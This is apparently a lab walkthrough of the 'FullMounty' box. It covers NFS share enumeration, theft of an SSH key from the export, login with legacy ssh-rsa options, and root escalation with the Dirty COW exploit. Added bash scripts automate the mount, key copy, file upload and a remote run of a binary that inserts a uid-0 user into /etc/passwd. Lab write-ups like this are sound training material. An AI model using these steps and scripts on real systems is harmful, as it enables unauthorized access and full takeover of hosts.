FullMounty

Nmap Scan Result

We have an NFS service running on port 2049. With showmount -e, I am able to see which directory the server exports, as seen below.

I mounted the /srv/exportnfs export to a folder under /tmp on my local machine. As seen, the export contains an SSH private and public key pair, which we can simply cat out or copy with cp. (NFS enforces permissions by numeric uid, so if the key had been readable only by its owner, we would first have had to create a local user with the matching uid, or mount as root against an export without root_squash.)
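The enumeration and mount steps above, as an added shell example that is not part of the original writeup. The target address 10.150.150.134 and the export path /srv/exportnfs come from the writeup; the mountpoint /tmp/nfs, the NFS mount options, the key location at the export root and the sample showmount output are my assumptions, with the sample constructed so the parsing part runs offline.

```bash
#!/bin/bash
# Added example, not from the original writeup. Enumerate an NFS export,
# mount it read-only and check the ownership of what it contains before
# copying the SSH key pair off the share.
# Assumptions: target 10.150.150.134 and export /srv/exportnfs are from the
# writeup; /tmp/nfs, NFSv3 options and the keys sitting at the export root
# are my choices.

TARGET=10.150.150.134

# Constructed sample of `showmount -e $TARGET` output (not captured from the box).
SAMPLE_SHOWMOUNT='Export list for 10.150.150.134:
/srv/exportnfs *'

# exports_from_showmount TEXT: print one export path per line, dropping the
# "Export list for ..." header and the allowed-clients column.
exports_from_showmount() {
    printf '%s\n' "$1" | awk 'NR > 1 && $1 ~ /^\// { print $1 }'
}

# mount_export HOST EXPORT MOUNTPOINT: mount the export read-only over NFSv3.
# nolock avoids needing a local lock daemon; ro keeps us from touching the
# share while we look around.
mount_export() {
    local host=$1 export_path=$2 mnt=$3
    mkdir -p "$mnt"
    sudo mount -t nfs -o ro,vers=3,nolock "$host:$export_path" "$mnt"
}

# show_ownership MOUNTPOINT: list files with numeric uid/gid. The server
# checks access by uid, not by name, so a file owned by uid 1000 there is
# readable only by a local uid 1000 (or by root if the export lacks root_squash).
show_ownership() {
    ls -lnR "$1"
}

# copy_keys MOUNTPOINT DEST: pull the key pair off the share so it survives
# the unmount, and tighten the private key as ssh will demand.
copy_keys() {
    local mnt=$1 dest=$2
    mkdir -p "$dest"
    cp "$mnt"/id_rsa "$mnt"/id_rsa.pub "$dest"/
    chmod 600 "$dest"/id_rsa
}

# Usage (network steps, not run here):
#   exports_from_showmount "$(showmount -e "$TARGET")"
#   mount_export "$TARGET" /srv/exportnfs /tmp/nfs
#   show_ownership /tmp/nfs
#   copy_keys /tmp/nfs "$HOME/loot"
#   sudo umount /tmp/nfs
```

If the mount hangs, the usual causes are a firewall in front of the mountd/statd side ports or a server that only speaks NFSv4; try vers=4 before anything else.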

From the comment field of the public key below, we can see that the key was created for the user deadbeef, so we can use that username for the SSH login...

...but we run into another issue: ssh rejects the server's host key, because this old server only offers ssh-rsa and modern OpenSSH (8.8 and later) disables that SHA-1 based signature scheme by default. We can fix this with the HostKeyAlgorithms option, and re-enable ssh-rsa for our own key with PubkeyAcceptedAlgorithms:

ssh deadbeef@10.150.150.134 -i id_rsa -o HostKeyAlgorithms=+ssh-rsa -o PubkeyAcceptedAlgorithms=+ssh-rsa 

Remember to restrict the private key's permissions first (chmod 600 id_rsa); ssh refuses to use a key file that is readable by other users.

Copy linpeas.sh to the target machine (scp works with the same options as the ssh command above) and run it to enumerate privilege escalation paths.
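The login and file-transfer steps above, as an added shell example that is not part of the original writeup. The user deadbeef, the host 10.150.150.134 and the key file name id_rsa are from the writeup; the sample public key line is constructed, and the extra KexAlgorithms and scp -O hints are my own notes on what else old servers tend to need.

```bash
#!/bin/bash
# Added example, not from the original writeup. Log in with the recovered key
# against an OpenSSH server old enough to offer only ssh-rsa host keys, and
# push linpeas.sh over the same channel.
# Assumptions: user deadbeef, host 10.150.150.134 and key file id_rsa are from
# the writeup; the sample public key line below is constructed.

TARGET=10.150.150.134
KEY=id_rsa

# Constructed public key line. The last field is the comment ssh-keygen writes
# at creation time (user@host), which is how the username was identified.
SAMPLE_PUBKEY='ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQC7example deadbeef@fullmounty'

# pubkey_user LINE: the user part of the comment on an OpenSSH public key line.
pubkey_user() {
    printf '%s\n' "$1" | awk '{ c = $NF; sub(/@.*$/, "", c); print c }'
}

# secure_key FILE: ssh refuses a private key readable by group/other
# ("Permissions 0644 for 'id_rsa' are too open"), so tighten it first.
# Prints the resulting mode string from ls -l so the caller can check it.
secure_key() {
    chmod 600 "$1"
    ls -l "$1" | cut -c1-10
}

# Options for a modern client (OpenSSH >= 8.8 drops ssh-rsa signatures by
# default) talking to a legacy server. PubkeyAcceptedAlgorithms was named
# PubkeyAcceptedKeyTypes before OpenSSH 8.5; use that name on older clients.
# If the key exchange is rejected as well, append
# -o KexAlgorithms=+diffie-hellman-group14-sha1.
LEGACY_OPTS='-o HostKeyAlgorithms=+ssh-rsa -o PubkeyAcceptedAlgorithms=+ssh-rsa'

# legacy_ssh USER HOST [CMD...]: interactive shell, or one remote command.
legacy_ssh() {
    local user=$1 host=$2; shift 2
    # shellcheck disable=SC2086  # LEGACY_OPTS is intentionally word-split
    ssh -i "$KEY" $LEGACY_OPTS "$user@$host" "$@"
}

# push_file LOCAL USER HOST REMOTE_PATH: scp with the same legacy options.
# scp in OpenSSH 9.0+ uses SFTP by default; if the old server has no sftp
# subsystem, add -O to fall back to the classic scp protocol.
push_file() {
    local src=$1 user=$2 host=$3 dst=$4
    # shellcheck disable=SC2086
    scp -i "$KEY" $LEGACY_OPTS "$src" "$user@$host:$dst"
}

# Usage (network steps, not run here):
#   user=$(pubkey_user "$(cat id_rsa.pub)")     # deadbeef
#   secure_key "$KEY"
#   push_file linpeas.sh "$user" "$TARGET" /tmp/linpeas.sh
#   legacy_ssh "$user" "$TARGET" 'chmod +x /tmp/linpeas.sh && /tmp/linpeas.sh'
```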

The Linux kernel is 2.6.32, running on Ubuntu Lucid (10.04 LTS). This is susceptible to the Dirty COW kernel exploit (CVE-2016-5195); Lucid reached end of life before the fix was published, so no patched kernel exists for it: https://www.exploit-db.com/exploits/40839

The target system doesn't have a C compiler (gcc) installed, so the best way to compile the exploit is to create a VM running the exact same kernel version and Ubuntu release (the compiled binary must also match the target's glibc, which a same-release VM guarantees). Ubuntu Lucid can be downloaded from here.

Run firefart's Dirty COW exploit on the VM first to confirm it builds and works; it asks you to enter the password for the firefart root account it will add to /etc/passwd.

Now run the exploit on the target machine, then su firefart with the password you chose. The exploit backs up the original file to /tmp/passwd.bak; restore it when you are done.
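The kernel check, build, transfer and run steps above, as one added shell example that is not part of the original writeup or of firefart's exploit. The host 10.150.150.134, user deadbeef and exploit-db 40839 (firefart's dirty.c) are from the writeup; the compile flags are the ones in dirty.c's own header comment, while the -static flag, the /tmp paths, the version-range check and the assumption that the Lucid VM has a static libc are mine.

```bash
#!/bin/bash
# Added example, not from the original writeup. Decide whether a kernel
# version string suggests Dirty COW (CVE-2016-5195), build firefart's dirty.c
# (exploit-db 40839) on a matching Lucid VM, then deploy and run it.
# Assumptions: host 10.150.150.134 and user deadbeef are from the writeup;
# paths, the -static flag and the new password are my choices.

TARGET=10.150.150.134
USER_NAME=deadbeef
KEY=id_rsa
LEGACY_OPTS='-o HostKeyAlgorithms=+ssh-rsa -o PubkeyAcceptedAlgorithms=+ssh-rsa'

# ver_num VERSION: "2.6.32-21-generic" -> 2006032, a single integer that
# orders kernel versions correctly while each component stays below 1000.
ver_num() {
    local v=${1%%-*}
    local IFS=.
    set -- $v
    echo $(( ${1:-0} * 1000000 + ${2:-0} * 1000 + ${3:-0} ))
}

# dirtycow_kernel_vulnerable VERSION: exit 0 if the mainline number falls in
# the affected range (2.6.22 up to the fixes in 4.8.3, 4.7.9 and 4.4.26;
# 4.9 shipped fixed). Distro and older stable kernels got backports without
# a mainline bump, so a "yes" is a hint to confirm, not a verdict. Lucid's
# 2.6.32 was end-of-life before October 2016 and never got a fix.
dirtycow_kernel_vulnerable() {
    local n branch
    n=$(ver_num "$1")
    branch=${1%%-*}; branch=${branch%.*}     # "2.6.32-21-generic" -> "2.6"
    [ "$n" -ge "$(ver_num 2.6.22)" ] || return 1
    case $branch in
        4.8) [ "$n" -lt "$(ver_num 4.8.3)" ] ;;
        4.7) [ "$n" -lt "$(ver_num 4.7.9)" ] ;;
        4.4) [ "$n" -lt "$(ver_num 4.4.26)" ] ;;
        *)   [ "$n" -lt "$(ver_num 4.9.0)" ] ;;
    esac
}

# build_dirty: run on the Lucid VM next to dirty.c. -pthread and -lcrypt are
# the flags from dirty.c's own header comment; -static is my addition so the
# binary does not depend on the target's libc (assumes libc6-dev on the VM,
# which ships libcrypt.a; drop it if the link fails and rely on the matching
# release instead).
build_dirty() {
    gcc -pthread dirty.c -o dirty -lcrypt -static
}

# deploy_and_run PASSWORD: copy the binary over, run it to replace the root
# line of /etc/passwd with user "firefart" (uid 0) and PASSWORD, and show the
# backup the exploit leaves. Assumes /tmp on the target is not mounted noexec.
# Dirty COW is a race: on a single-CPU 2.6.32 box it may take a while or need
# a second try, and it can leave the kernel unstable, so do it late.
deploy_and_run() {
    local pw=$1
    # shellcheck disable=SC2086  # LEGACY_OPTS is intentionally word-split
    scp -i "$KEY" $LEGACY_OPTS dirty "$USER_NAME@$TARGET:/tmp/dirty"
    # shellcheck disable=SC2086
    ssh -i "$KEY" $LEGACY_OPTS "$USER_NAME@$TARGET" \
        "chmod +x /tmp/dirty && /tmp/dirty '$pw' && ls -l /tmp/passwd.bak"
}

# Usage (build on the VM, the rest from the attacker machine; not run here):
#   dirtycow_kernel_vulnerable "$(ssh ... uname -r)" && echo "worth trying"
#   build_dirty
#   deploy_and_run 'Choose-A-Password'
# Then on the target: su firefart, and when finished restore the original
# file so the box keeps working: mv /tmp/passwd.bak /etc/passwd
```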